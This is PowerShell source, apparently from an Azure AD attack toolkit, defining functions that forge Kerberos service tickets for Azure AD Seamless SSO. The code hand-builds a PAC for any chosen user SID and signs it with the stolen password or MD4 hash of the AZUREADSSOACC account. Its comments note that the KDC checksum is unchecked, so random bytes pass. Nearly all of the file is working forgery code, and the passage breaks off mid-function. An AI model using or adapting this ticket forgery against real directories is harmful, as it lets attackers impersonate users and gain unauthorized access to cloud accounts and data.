Kerberos.ps1

# Generates PAC for the kerberos ticket
# Aug 8th 2019
Function New-PAC
{
    
    [cmdletbinding()]
    Param(
        [Parameter(Mandatory=$True)]
        [String]$UserName,
        [Parameter(Mandatory=$False)]
        [String]$UserDisplayName,
        [Parameter(Mandatory=$False)]
        [String]$UserPrincipalName,
        [Parameter(Mandatory=$True)]
        [String]$ServerName,
        [Parameter(Mandatory=$True)]
        [String]$DomainName,
        [Parameter(Mandatory=$True)]
        [String]$DomainDNSName,
        [Parameter(Mandatory=$True)]
        [Byte[]]$Sid,
        [Parameter(Mandatory=$False)]
        [String]$Password,
        [Parameter(Mandatory=$False)]
        [String]$Hash,
        [Parameter(Mandatory=$True)]
        [DateTime]$AuthTime,
        [Parameter(Mandatory=$False)]
        [Int]$SequenceNumber=([System.Random]::new()).Next(),

        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/b10cfda1-f24f-441b-8f43-80cb93e786ec
        [Parameter(Mandatory=$False)]
        [Int]$UserAccountControl=0x00000080 # USER_WORKSTATION_TRUST_ACCOUNT #0x00000010 <# USER_NORMAL_ACCOUNT #> -bor 0X00000200 <# USER_DONT_EXPIRE_PASSWORD #>
    )
    
    Process
    {
        # Set the timestamps
        $DeviceId =           $authTime                     # MUST be same than authTime
        $LogonTime =          $DeviceId.AddMinutes(-10)     # We've logged in 10 minutes ago :)
        $PwdLastChangeTime =  (Get-Date).AddDays(-10)       # We've changed our password 10 days ago,
        $PwdCanChangeTime =   $PwdLastChangeTime.AddDays(1) # so we could've changed it 9 days ago

        # Convert names to Unicode byte strings
        $bDomainName =        [system.text.encoding]::unicode.GetBytes(       $DomainName)
        $bUserName =          [system.text.encoding]::unicode.GetBytes(         $UserName) 
        $bUserDisplayName =   [system.text.encoding]::unicode.GetBytes(  $UserDisplayName)
        $bServerName =        [system.text.encoding]::unicode.GetBytes(       $ServerName)
        $bDomainDNSName =     [system.text.encoding]::unicode.GetBytes(    $DomainDNSName)
        $bUserPrincipalName = [system.text.encoding]::unicode.GetBytes($UserPrincipalName)

        # Extract the user and domain sids
        $bUserSid = $Sid[24..27]
        $bDomainSid = $Sid[0..23]
        $bDomainSid[1]=4 # Need to change from 5 to 4

        # Construct the PACs
        $LOGON_INFORMATION=[byte[]]@(    
            @(0x01)                   # Version = 0x01
            @(0x10)                   # Endianness (=little endian)
            @(0x08, 0x00)             # Length = 0x08
            @(0xCC, 0xCC, 0xCC, 0xCC) # Filler
            @(0x00, 0x00, 0x00, 0x00) # Length of the info buffer (placeholder)
            @(0x00, 0x00, 0x00, 0x00) # Zeros
            
            @(0x00, 0x00, 0x02, 0x00) # User info pointer

            [System.BitConverter]::GetBytes($LogonTime.ToFileTimeUtc())         # LogonTime
            @(0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F)                   # LogOffTime
            @(0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F)                   # KickOffTime
            [System.BitConverter]::GetBytes($PwdLastChangeTime.ToFileTimeUtc()) # PwdLastChangeTime
            [System.BitConverter]::GetBytes($PwdCanChangeTime.ToFileTimeUtc())  # PwdCanChangeTime
            @(0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F)                   # PwdMustChangeTime
            # UserName
                [System.BitConverter]::GetBytes([int16]($bUserName.Length)) # Length
                [System.BitConverter]::GetBytes([int16]($bUserName.Length)) # Max length
                @(0x04, 0x00, 0x02, 0x00)                                   # Pointer
            # UserDisplayName
                [System.BitConverter]::GetBytes([int16]($bUserDisplayName.Length)) # Length
                [System.BitConverter]::GetBytes([int16]($bUserDisplayName.Length)) # Max Length
                @(0x08, 0x00, 0x02, 0x00)                                          # Pointer
            # LogonScript
                @(0x00, 0x00)             # Length
                @(0x00, 0x00)             # Max Length
                @(0x0C, 0x00, 0x02, 0x00) # Pointer
            # ProfilePath
                @(0x00, 0x00)             # Length
                @(0x00, 0x00)             # Max Length
                @(0x10, 0x00, 0x02, 0x00) # Pointer
            # HomeDirectory
                @(0x00, 0x00)             # Length
                @(0x00, 0x00)             # Max Length
                @(0x14, 0x00, 0x02, 0x00) # Pointer
            # HomeDrive
                @(0x00, 0x00)             # Length
                @(0x00, 0x00)             # Max Length
                @(0x18, 0x00, 0x02, 0x00) # Pointer
            
            @(0x05, 0x00) # LogonCount -- just add something..
            @(0x00, 0x00) # BadPasswordCount

            
            $bUserSid                 # UserSid
            [System.BitConverter]::GetBytes([int32](513)) # GroupSid:
                                                          # https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups
                                                          # 0x0200 = 512 = Domain Admins
                                                          # 0x0201 = 513 = Domain Users
                                                          # 0x0202 = 514 = Domain Guests
                                                          # 0x0203 = 515 = Domain Computers
                                                          # 0x0204 = 516 = Domain Controllers
                                                          # 0x0207 = 519 = Enterprise Admins
                                                          # 0x020f = 527 = Key Admins
                                                          # 0x0220 = 544 = Local Admins
            @(0x02, 0x00, 0x00, 0x00) # GroupCount
            @(0x1C, 0x00, 0x02, 0x00) # GroupPointer
    
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/69e86ccc-85e3-41b9-b514-7d969cd0ed73
            @(0x20, 0x00, 0x00, 0x00) # UserFlags
                                      # 0x 20 = ExtraSid is populated and contains additional SIDs
                                      # 0x200 = ResourceGroupIds field is populated.
    
            # UserSessionKey - used only for NTLM
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
    
            # ServerName
                [System.BitConverter]::GetBytes([int16]($bServerName.Length))   # Length
                [System.BitConverter]::GetBytes([int16]($bServerName.Length+2)) # MaxLength -- Why + 2 for the size??
                @(0x20, 0x00, 0x02, 0x00)                                       # Pointer
            # DomainName
                [System.BitConverter]::GetBytes([int16]($bDomainName.Length))   # Length
                [System.BitConverter]::GetBytes([int16]($bDomainName.Length+2)) # MaxLength
                @(0x24, 0x00, 0x02, 0x00)                                       # Pointer
            
            @(0x28, 0x00, 0x02, 0x00)                                   # DomainIDPointer
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)           # Reserved = 8 x 0x00
            [System.BitConverter]::GetBytes([int32]$UserAccountControl) # UserAccountControl
            @(0x00, 0x00, 0x00, 0x00)                                   # SubAuthStatus
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)           # LastSuccessfullLogon
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)           # LastFailedLogon
            @(0x00, 0x00, 0x00, 0x00)                                   # Failed Logon Count

            @(0x00, 0x00, 0x00, 0x00) # Reserved
            @(0x01, 0x00, 0x00, 0x00) # ExtraSidCount
            @(0x2C, 0x00, 0x02, 0x00) # ExtraSidPointer
                
            @(0x00, 0x00, 0x00, 0x00) # ResourceDomainIdPointer
            @(0x00, 0x00, 0x00, 0x00) # ResourceGroupCount
            @(0x00, 0x00, 0x00, 0x00) # ResourceGroupPointer
    
        # STRINGS
            # UserName
                [System.BitConverter]::GetBytes([int32]($bUserName.Length)/2) # Total = maxlength / 2
                @(0x00, 0x00, 0x00, 0x00)                                     # Unused
                [System.BitConverter]::GetBytes([int32]($bUserName.Length)/2) # used = maxlength / 2
                $bUserName

            if($bUserName.Length/2 % 2 -gt 0){@(0x00, 0x00)} # Must be even sized
        
            # UserDisplayName
                [System.BitConverter]::GetBytes([int32]($bUserDisplayName.Length/2)) # Total
                @(0x00, 0x00, 0x00, 0x00)                                            # Unused
                [System.BitConverter]::GetBytes([int32]($bUserDisplayName.Length/2)) # Used
                if($bUserDisplayName.Length -gt 0){$bUserDisplayName}

            if($bUserDisplayName.Length/2 % 2 -gt 0){@(0x00, 0x00)} # Must be even sized
            
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00) # LogonScript
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00) # ProfilePath
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00) # HomeDirectory
            @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00) # HomeDrive
    
            # GroupSids
                @(0x02, 0x00, 0x00, 0x00)                         # Count
                @(0x03, 0x02, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00) 
                @(0x0F, 0x02, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00) 

            # ServerName
                [System.BitConverter]::GetBytes([int32]($bServerName.Length)/2+1) # Total
                @(0x00, 0x00, 0x00, 0x00) # Unused
                [System.BitConverter]::GetBytes([int32]($bServerName.Length)/2)   # Length
                $bServerName

                if($bServerName.Length/2 % 2 -gt 0){@(0x00, 0x00)} # Must be even sized
             # DomainName
                [System.BitConverter]::GetBytes([int32]($bDomainName.Length)/2+1) # Total
                @(0x00, 0x00, 0x00, 0x00)                                         
                [System.BitConverter]::GetBytes([int32]($bDomainName.Length)/2)   # Length
                $bDomainName 
                if($bDomainName.Length/2 % 2 -gt 0){@(0x00, 0x00)} # Must be even sized

            # DomainSid
                @(0x04, 0x00, 0x00, 0x00) # Count
                $bDomainSid               # SidBytes
            # ExtraSid
                @(0x01, 0x00, 0x00, 0x00) # Count
                @(0x30, 0x00, 0x02, 0x00) # Pointer
                @(0x07, 0x00, 0x00, 0x00) # Attributes
                @(0x01, 0x00, 0x00, 0x00) # SidSize (count)
                @(0x01, 0x01, 0x00, 0x00, # Sid
                  0x00, 0x00, 0x00, 0x12, 
                  0x01, 0x00, 0x00, 0x00) 
        )
        # Set the correct size: Total size - the header
        $size = $LOGON_INFORMATION.Count - 16 #
        [Array]::Copy([bitconverter]::GetBytes([Int32]$size),0, $LOGON_INFORMATION, 8, 4)

        $CLIENT_NAME_TICKET_INFO=@(
            [System.BitConverter]::GetBytes($DeviceId.ToFileTime())     # ClientId - MUST be equal to authTime
            [System.BitConverter]::GetBytes([int16]($bUserName.Length)) # Name Length
            $bUserName
        )
        $UPN_DOMAIN_INFO=@(
            [System.BitConverter]::GetBytes([int16]($bUserPrincipalName.Length))      # UpnLength
            [System.BitConverter]::GetBytes([int16]0x10)                              # UpnOffset
            [System.BitConverter]::GetBytes([int16]($bDomainDNSName.Length))          # DnsDomainNameLength
            [System.BitConverter]::GetBytes([int16]($bUserPrincipalName.Length+0x10)) # DnsDomainNameOffset
    
            @(0x00, 0x00, 0x00, 0x00) # Flags
            @(0x00, 0x00, 0x00, 0x00) # Some align thing?
            $bUserPrincipalName       # UPN
            $bDomainDNSName           # DNS Domain
        )
        $SERVER_CHECKSUM=@(
            @(0x76, 0xFF, 0xFF, 0xFF) # Type = KERB_CHECKSUM_HMAC_MD5
            @(0x00, 0x00, 0x00, 0x00, # Server checksum - MUST be 0x00 to calculate checksum
              0x00, 0x00, 0x00, 0x00, 
              0x00, 0x00, 0x00, 0x00, 
              0x00, 0x00, 0x00, 0x00)
        )
        $PRIVILEGE_SERVER_CHECKSUM=@(
            @(0x10, 0x00, 0x00, 0x00) # Type = HMAC_SHA1_96_AES256
            @(0x00, 0x00, 0x00, 0x00, # KDC checksum - MUST be 0x00 to calculate (server) checksum
              0x00, 0x00, 0x00, 0x00, # Otherwise this is not needed nor used
              0x00, 0x00, 0x00, 0x00)
        )


        # Construct the header
        $Offset = 88

        $HEADER = @()

        # Align the blocks
        $logon_info_size =      Align-Size -Size $LOGON_INFORMATION.Length         -Mask 8
        $client_info_size =     Align-Size -Size $CLIENT_NAME_TICKET_INFO.Length   -Mask 8
        $upn_info_size =        Align-Size -Size $UPN_DOMAIN_INFO.Length           -Mask 8
        $server_check_size =    Align-Size -Size $SERVER_CHECKSUM.Length           -Mask 8 
        $privilege_check_size = Align-Size -Size $PRIVILEGE_SERVER_CHECKSUM.Length -Mask 8

        $HEADER += @(0x05, 0x00, 0x00, 0x00) # Pac count = 5
        $HEADER += @(0x00, 0x00, 0x00, 0x00) # Version = 0

        $HEADER += @(0x01, 0x00, 0x00, 0x00)                                 # LOGON INFO
        $HEADER += [System.BitConverter]::GetBytes([int32]$logon_info_size)  # Size
        $HEADER += [System.BitConverter]::GetBytes([int64]$Offset)           # Offset
        $Offset+=$logon_info_size

        $HEADER += @(0x0A,  0x00,  0x00,  0x00)                              # CLIENT_NAME_TICKET_INFO
        $HEADER += [System.BitConverter]::GetBytes([int32]$client_info_size) # Size
        $HEADER += [System.BitConverter]::GetBytes([int64]$Offset)           # Offset
        $Offset+=$client_info_size

        $HEADER += @(0x0C,  0x00,  0x00,  0x00)                              # UPN_DOMAIN_INFO
        $HEADER += [System.BitConverter]::GetBytes([int32]$upn_info_size)    # Size
        $HEADER += [System.BitConverter]::GetBytes([int64]$Offset)           # Offset
        $Offset+=$upn_info_size
    
        $HEADER += @(0x06,  0x00,  0x00,  0x00)                                 # SERVER_CHECKSUM
        $HEADER += [System.BitConverter]::GetBytes([int32]$server_check_size-4) # Size
        $HEADER += [System.BitConverter]::GetBytes([int64]$Offset)              # Offset
        $Offset+=$server_check_size
    
        $HEADER += @(0x07,  0x00,  0x00,  0x00)                                  # PRIVILEGE_SERVER_CHECKSUM
        $HEADER += [System.BitConverter]::GetBytes([int32]$privilege_check_size) # Size
        $HEADER += [System.BitConverter]::GetBytes([int64]$Offset)               # Offset
        

        # Construct the PAC
        $PAC=@()

        $PAC += $HEADER
        $PAC += $LOGON_INFORMATION
        $PAC += Get-AlignBytes -Size $LOGON_INFORMATION.Length -Mask 8
        $PAC += $CLIENT_NAME_TICKET_INFO
        $PAC += Get-AlignBytes -Size $CLIENT_NAME_TICKET_INFO.Length -Mask 8
        $PAC += $UPN_DOMAIN_INFO 
        $PAC += Get-AlignBytes -Size $UPN_DOMAIN_INFO.Length -Mask 8
        $PAC +=  $SERVER_CHECKSUM          # KERB_CHECKSUM_HMAC_MD5
        $PAC += Get-AlignBytes -Size $SERVER_CHECKSUM.Length -Mask 8
        $PAC += $PRIVILEGE_SERVER_CHECKSUM #HMAC_SHA1_96_AES256
        $PAC += Get-AlignBytes -Size $PRIVILEGE_SERVER_CHECKSUM.Length -Mask 8
        
        # Convert the password to MD4 hash
        if([string]::IsNullOrEmpty($Hash))
        {
            $checksum_key = Get-MD4 -String $Password -AsByteArray
        }
        else
        {
            $checksum_key = Convert-HexToByteArray -HexString $Hash
        }
        # Checksums
        $serverChecksum = Get-ServerSignature -Key $checksum_key -Data $PAC
        $KDCChecksum =    Get-RandomBytes -Bytes 12 # Not checked by the server, so random checksum will do

        # Create the signature block - Only server block gets validated in the server
        $signatureBlock = @(
            @(0x76, 0xFF, 0xFF, 0xFF) # Type = KERB_CHECKSUM_HMAC_MD5
            $serverChecksum
            (Get-AlignBytes -Size $SERVER_CHECKSUM.Length -Mask 8)
            @(0x10, 0x00, 0x00, 0x00)       # Type = HMAC_SHA1_96_AES256
            $KDCChecksum
            (Get-AlignBytes -Size $PRIVILEGE_SERVER_CHECKSUM.Length -Mask 8)
        )

        # Add signature block to the end of the PAC
        $PAC=$PAC[0..($PAC.Length - $signatureBlock.Length-1)] + $signatureBlock

        # Return
        return [byte[]]$PAC
    }
}


# Aug 26th 2019
# Generates a kerberos token to be used with Azure AD Desktop SSO (aka Seamless SSO)
Function New-KerberosTicket
{
    <#
    .SYNOPSIS
    Generates a kerberos token to be used with Azure AD Desktop SSO

    .DESCRIPTION
    Generates a kerberos token to be used with Azure AD Desktop SSO, also known as Seamless SSO.
    Azure AD does only care about user's sid, so no other information needs to be given.

    .Parameter Sid
    User's sid as a byte array

    .Parameter ADUserPrincipalName
    User's principal name. Used to find user from Active Directory to get the SID

    .Parameter AADUserPrincipalName
    User's principal name. Used to find user from Azure Active Directory to get the SID

    .Parameter AccessToken
    Access Token of the user accessing Azure Active Directory to find the given user to get the SID

    .Parameter Password
    Password of the AZUREADSSOACC computer account

    .Parameter Hash
    MD4 hash of the AZUREADSSOACC computer account

    .Example
    PS C:\>Get-AADIntKerberosTicket -Password "MyPassword" -Sid $sid

    YIIHIAYGKwYBBQUCoIIHFDCCBxC..(truncated)..qJ9OYopBjdCAzi8gY8dIFy8+g==

    .Example
    PS C:\>Get-AADIntKerberosTicket -Hash @(0,4,234) -Sid $sid

    YIIHIAYGKwYBBQUCoIIHFDCCBxC..(truncated)..qJ9OYopBjdCAzi8gY8dIFy8+g==

    .Example
    PS C:\>Get-AADIntKerberosTicket -Password "MyPassword" -SidString "S-1-5-21-854568531-3289094026-2628502219-1111"

    YIIHIAYGKwYBBQUCoIIHFDCCBxC..(truncated)..qJ9OYopBjdCAzi8gY8dIFy8+g==

    .Example
    PS C:\>Get-AADIntKerberosTicket -Password "MyPassword" -ADUserPricipalName "user@company.com"
    WARNING: SID not given, trying to find user from the Active Directory

    YIIHIAYGKwYBBQUCoIIHFDCCBxC..(truncated)..qJ9OYopBjdCAzi8gY8dIFy8+g==

    PS C:\>Get-AADIntKerberosTicket -Password "MyPassword" -ADUserPricipalName "user@company.com"
    WARNING: SID not given, trying to find user from the Azure Active Directory.
    WARNING: This may take some time, so it would be better to save the AAD objects to
    WARNING: a variable using Get-AADIntSyncObjects and parse SID manually.

    YIIHIAYGKwYBBQUCoIIHFDCCBxC..(truncated)..qJ9OYopBjdCAzi8gY8dIFy8+g==
    
#>

    [cmdletbinding()]
    Param(
        [Parameter(ParameterSetName='Sid',Mandatory=$True)]
        [Byte[]]$Sid,
        [Parameter(ParameterSetName='SidString',Mandatory=$True)]
        [String]$SidString,
        [Parameter(ParameterSetName='ADupn',Mandatory=$True)]
        [String]$ADUserPrincipalName,
        [Parameter(ParameterSetName='AADupn',Mandatory=$True)]
        [String]$AADUserPrincipalName,
        [Parameter(ParameterSetName='AADupn',Mandatory=$True)]
        [String]$AccessToken,
        [Parameter(Mandatory=$False)]
        [String]$Password,
        [Parameter(Mandatory=$False)]
        [String]$Hash,
        [Parameter(Mandatory=$False)]
        [byte[]]$SessionKey=(New-Guid).ToByteArray(),


        [Parameter(Mandatory=$False)]
        [String]$UserName=          "UserName",
        [Parameter(Mandatory=$False)]
        [String]$UserDisplayName=   "DisplayName",
        [Parameter(Mandatory=$False)]
        [String]$UserPrincipalName= "UserName@company.com",
        [Parameter(Mandatory=$False)]
        [String]$ServerName=        "DC1.company.com",
        [Parameter(Mandatory=$False)]
        [String]$DomainName=        "COMPANY",
        [Parameter(Mandatory=$False)]
        [String]$Realm=             "COMPANY.COM",
        [Parameter(Mandatory=$False)]
        [String]$ServiceTarget = "HTTP/autologon.microsoftazuread-sso.com",

        [Parameter(Mandatory=$False)]
        [ValidateSet('RC4','AES')]
        [String]$Crypto="RC4",

        [Parameter(Mandatory=$False)]
        [String]$Salt,

        [Parameter(Mandatory=$False)]
        [Int]$SequenceNumber=([System.Random]::new()).Next()

    )
    Process
    {
        # Hash or password must be given!
        if([string]::IsNullOrEmpty($Password) -and $Hash -eq $null)
        {
            Throw "Password or hash must be given!"
        }

        if(![string]::IsNullOrEmpty($Salt))
        {
            $AESSalt = [text.encoding]::UTF8.getBytes($Salt)
        }

        if($Crypto -eq "AES" -and $AESSalt -eq $null)
        {
            Throw "Salt needed for AES encrypted Kerberos ticket!"
        }

        # Got ADUserPrincipalName so we need to try to find SID from AD
        if(![String]::IsNullOrEmpty($ADUserPrincipalName))
        {
            Write-Verbose "SID not given, trying to find user from the Active Directory"
            try
            {
                $User=Get-Sids -UserPrincipalName $ADUserPrincipalName
                if($user -eq $null)
                {
                    return
                }
                $sidObject = [System.Security.Principal.SecurityIdentifier]$user.Sid
                $Sid = New-Object Byte[] $sidObject.BinaryLength
                $sidObject.GetBinaryForm($Sid,0)
                Write-Verbose "$([byte[]]$Sid | Format-Hex)"
            }
            catch
            {
                Write-Error "Couldn't find the user: $($_.Exception)"
                return
            }
        }
        # Got AADUserPrincipalName so we need to try to find SID from Azure AD
        elseif(![String]::IsNullOrEmpty($AADUserPrincipalName))
        {
            Write-Verbose "SID not given, trying to find user from the Azure Active Directory."
            try
            {
                $User=Get-Sids -AccessToken $AccessToken -UserPrincipalName $AADUserPrincipalName
                if($user -eq $null)
                {
                    return
                }
                $sidObject = [System.Security.Principal.SecurityIdentifier]$user.Sid
                $Sid = New-Object Byte[] $sidObject.BinaryLength
                $sidObject.GetBinaryForm($Sid,0)
                Write-Verbose "$([byte[]]$Sid | Format-Hex)"

            }
            catch
            {
                Write-Error "Couldn't find the user: $($_.Exception)"
                return
            }
        }
        # Got SidString so try to convert it
        elseif(![String]::IsNullOrEmpty($SidString))
        {
            try
            {
                Write-Verbose "Got SidString: $SidString"
                $sidObject = [System.Security.Principal.SecurityIdentifier]$SidString
                $Sid = New-Object Byte[] $sidObject.BinaryLength
                $sidObject.GetBinaryForm($Sid,0)
                Write-Verbose (Convert-ByteArrayToHex -Bytes $Sid)
            }
            catch
            {
                Write-Error "Couldn't convert `"$SidString`" to SID: $($_.Exception)"
                return
            }
        }

        # KRB_AP_REQ
        # Set the times
        
        $authTime = Get-Date -Millisecond 0
        $authTime.AddSeconds(-43) | Out-Null # Authentication time should be (a little) in the past
        $startTime = $authTime #.AddSeconds(7)
        $endTime = $authTime.AddHours(10)
        $renewTime = $authTime.AddDays(7)
        $cTime = Get-Date
        

        $machineId =  Get-RandomBytes -Bytes 32
        $kerbLocal1 = Get-RandomBytes -Bytes 16
        $kerbLocal2 = Get-RandomBytes -Bytes 16

        # The ticket
        $ticket=Add-DERTag -Tag 0x63 -Data @(
            Add-DERSequence -Data @(
            Add-DERTag -Tag 0xA0 -Data @(Add-DERTag -Tag 0x03 -Data @(0x00, 0x40, 0xA1, 0x00, 0x00)) #Flags 100 0000 1010 0001 old
            # Encryption key 100 0000 0010 0001 new
            Add-DERTag -Tag 0xA1 -Data @(
                Add-DERSequence -Data @(
                    if($Crypto -eq "RC4")
                    {
                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x17)) # rc4-hmac
                    }
                    elseif($Crypto -eq "AES")
                    {
                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x12)) # aes256-cts-hmac-sha1-96
                    }
                    Add-DERTag -Tag 0xA1 -Data @(
                        Add-DERTag -Tag 0x04 -Data $SessionKey # Session key
                    )
                )
            )
            # Realm
            Add-DERTag -Tag 0xA2 -Data @(Add-DERUtf8String($Realm))
            Add-DERTag -Tag 0xA3 -Data @( # CName
                Add-DERSequence -Data @(
                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x01)) # NT_PRINCIPAL
                    Add-DERTag -Tag 0xA1 -Data @(
                        Add-DERSequence -Data @(Add-DERUtf8String($UserName))
                    )
                )
            )
            Add-DERTag -Tag 0xA4 -Data @(
                Add-DERSequence -Data @(
                    Add-DERTag -Tag 0xA0 -data @(Add-DERInteger -Data @(0x01))
                    Add-DERTag -Tag 0xA1 -Data @(0x04,0x00) # Empty octect string: CAddr
                )
            )
            
            Add-DERTag -Tag 0xA5 -Data @(Add-DERDate -Date $authTime) # Generalized time: AuthTime
            Add-DERTag -Tag 0xA6 -Data @(Add-DERDate -Date $startTime) # Generalized time: StartTime
            Add-DERTag -Tag 0xA7 -Data @(Add-DERDate -Date $endTime) # Generalized time: EndTime
            Add-DERTag -Tag 0xA8 -Data @(Add-DERDate -Date $renewTime) # Generalized time: RenewTill
            Add-DERTag -Tag 0xAA -Data @(
                Add-DERSequence -Data @(
                    Add-DERSequence -Data @(

                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x01)) # ADIfRelevant
                    Add-DERTag -Tag 0xA1 -Data @(
                        Add-DERTag -Tag 0x04 -Data @(
                            Add-DERSequence -Data @(
                                Add-DERSequence -Data @(
                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x80)) # PAC type = AdWin2kPac
                                    Add-DERTag -Tag 0xA1 -Data @(
                                    
                                        Add-DERTag -Tag 0x04 -Data @(
                                            # Generate PAC
                                            [byte[]](New-Pac -UserName $UserName -UserDisplayName $UserDisplayName -UserPrincipalName $UserPrincipalName -ServerName $ServerName -DomainName $DomainName -DomainDNSName $Realm -Sid $Sid -Password $Password -Hash $Hash -AuthTime $authTime -SequenceNumber $SequenceNumber)) 
                                    )
                                )
                            )
                            
                        )
                    )
                )
                    Add-DERSequence -Data @(
                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x01)) 
                    Add-DERTag -Tag 0xA1 -Data @(
                        Add-DERTag -Tag 0x04 -Data @(

                            Add-DERSequence -Data @(
                                Add-DERSequence -Data @( 
                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x8D)) # KERB_AUTH_DATA_TOKEN_RESTRICTIONS
                                    Add-DERTag -Tag 0xA1 -Data @( 
                                        Add-DERTag -Tag 0x04 -Data @( # Octet string
                                            Add-DERSequence -Data @(
                                                Add-DERSequence -Data @(
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00)) # Restrictiontype, must be 0x00
                                                    Add-DERTag -Tag 0xA1 -Data @(
                                                        Add-DERTag -Tag 0x04 -Data @(
                                                            # Flags
                                                            @(0x00, 0x00, 0x00, 0x00)  # Full token
                                                            #@(0x01, 0x00, 0x00, 0x00) # UAC restricted token
                                                            # Integritylevel
                                                            # @(0x00, 0x00, 0x00, 0x00) # Untrusted
                                                            @(0x00, 0x10, 0x00, 0x00)   # Low
                                                            # @(0x00, 0x20, 0x00, 0x00) # Medium
                                                            # @(0x00, 0x30, 0x00, 0x00) # High
                                                            # @(0x00, 0x40, 0x00, 0x00) # System
                                                            # @(0x00, 0x50, 0x00, 0x00) # Protected processes
                                                            # Machine Id
                                                            $machineId
                                                        )
                                                    )
                                                )
                                            )
                                        )
                                    )

                                )
                            
                                Add-DERSequence -Data @(
                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x8E))
                                    # KerbLocal
                                    Add-DERTag -Tag 0xA1 -Data @(Add-DERTag -Tag 0x04 -Data $kerbLocal1)
                                )
                                
                            )
                            
                        )
                    )
                )
                )
            )
        )
        )
        $encryptionKey = New-KerberosKey -Password $Password -Hash $Hash -Crypto $Crypto
        $encryptedTicket = Encrypt-Kerberos -Data $ticket -Type Ticket -Salt $AESSalt -Crypto $Crypto -Key $encryptionKey
    
        $authenticator=Add-DERTag -Tag 0x62 -Data @(
            Add-DERSequence -Data @(
                Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x05))
                Add-DERTag -Tag 0xA1 -Data @(Add-DERUtf8String -Text $Realm -Tag 0x1B)
                Add-DERTag -Tag 0xA2 -Data @(
                    Add-DERSequence -Data @(
                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x01))
                        Add-DERTag -Tag 0xa1 -Data @(
                            Add-DERSequence -Data @(
                                Add-DERUtf8String -Text $UserName -Tag 0x1B
                            )
                        )
                    )
                )
                Add-DERTag -Tag 0xA3 -Data @(
                    # Authenticator checksum
                    # https://tools.ietf.org/html/rfc4121#page-6
                    Add-DERSequence -Data @(
                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x80, 0x03)) # Checksum type 32771 = KRBv5
                        # Checksum https://tools.ietf.org/html/rfc4121#section-4.1.1
                        Add-DERTag -Tag 0xA1 -Data @(
                            Add-DERTag -Tag 0x04 -Data @(
                                # Length = 0x10 = 16
                                @(0x10, 0x00, 0x00, 0x00)
                                # Binding information
                                @(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
                                
                                # Flags
                                # https://tools.ietf.org/html/rfc2744
                                # GSS_C_DELEG_FLAG 0x01 1
                                # GSS_C_MUTUAL_FLAG 0x02 2
                                # GSS_C_REPLAY_FLAG 0x04 4
                                # GSS_C_SEQUENCE_FLAG 0x08 8
                                # GSS_C_CONF_FLAG 0x10 16
                                # GSS_C_INTEG_FLAG 0x20 32
                                # GSS_C_ANON_FLAG 0x40 64
                                # GSS_C_PROT_READY_FLAG 0x80 128

                                # GSS_C_TRANS_FLAG 0x100 256

                                # GSS_C_DCE_STYLE 0x1000 4096
                                # GSS_C_IDENTIFY_FLAG 0x2000 8192
                                # GSS_C_EXTENDED_ERROR_FLAG 0x4000 16384
                                # GSS_C_DELEG_POLICY_FLAG 0x8000 32768

                                @(0x3E, 0x20, 0x00, 0x00)

                                
                            )
                        )
                    )
                )
                Add-DERTag -Tag 0xA4 -Data @(Add-DERInteger -Data (0x01)) # Cusec = milliseconds part of authTime -- for replay detection, so can be anything
                Add-DERTag -Tag 0xA5 -Data @(Add-DERDate    -Date $cTime) # CTime

                
                Add-DERTag -Tag 0xA6 -Data @(
                    Add-DERSequence -Data @(
                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x17)) # Subkey - not used here to anything
                        Add-DERTag -Tag 0xA1 -Data @(Add-DERTag -Tag 0x04 -Data (New-Guid).ToByteArray())
                    )
                )
                Add-DERTag -Tag 0xA7 -Data @(Add-DERInteger -Data @([System.BitConverter]::GetBytes($SequenceNumber)) ) # Sequence number
                
                Add-DERTag -Tag 0xA8 -Data @(
                        Add-DERSequence -Data @(
                            Add-DERSequence -Data @(
                                Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x01))
                                Add-DERTag -Tag 0xA1 -Data @(
                                    Add-DERTag -Tag 0x04 -Data @(
                                        Add-DERSequence -Data @(
                                                Add-DERSequence -Data @(
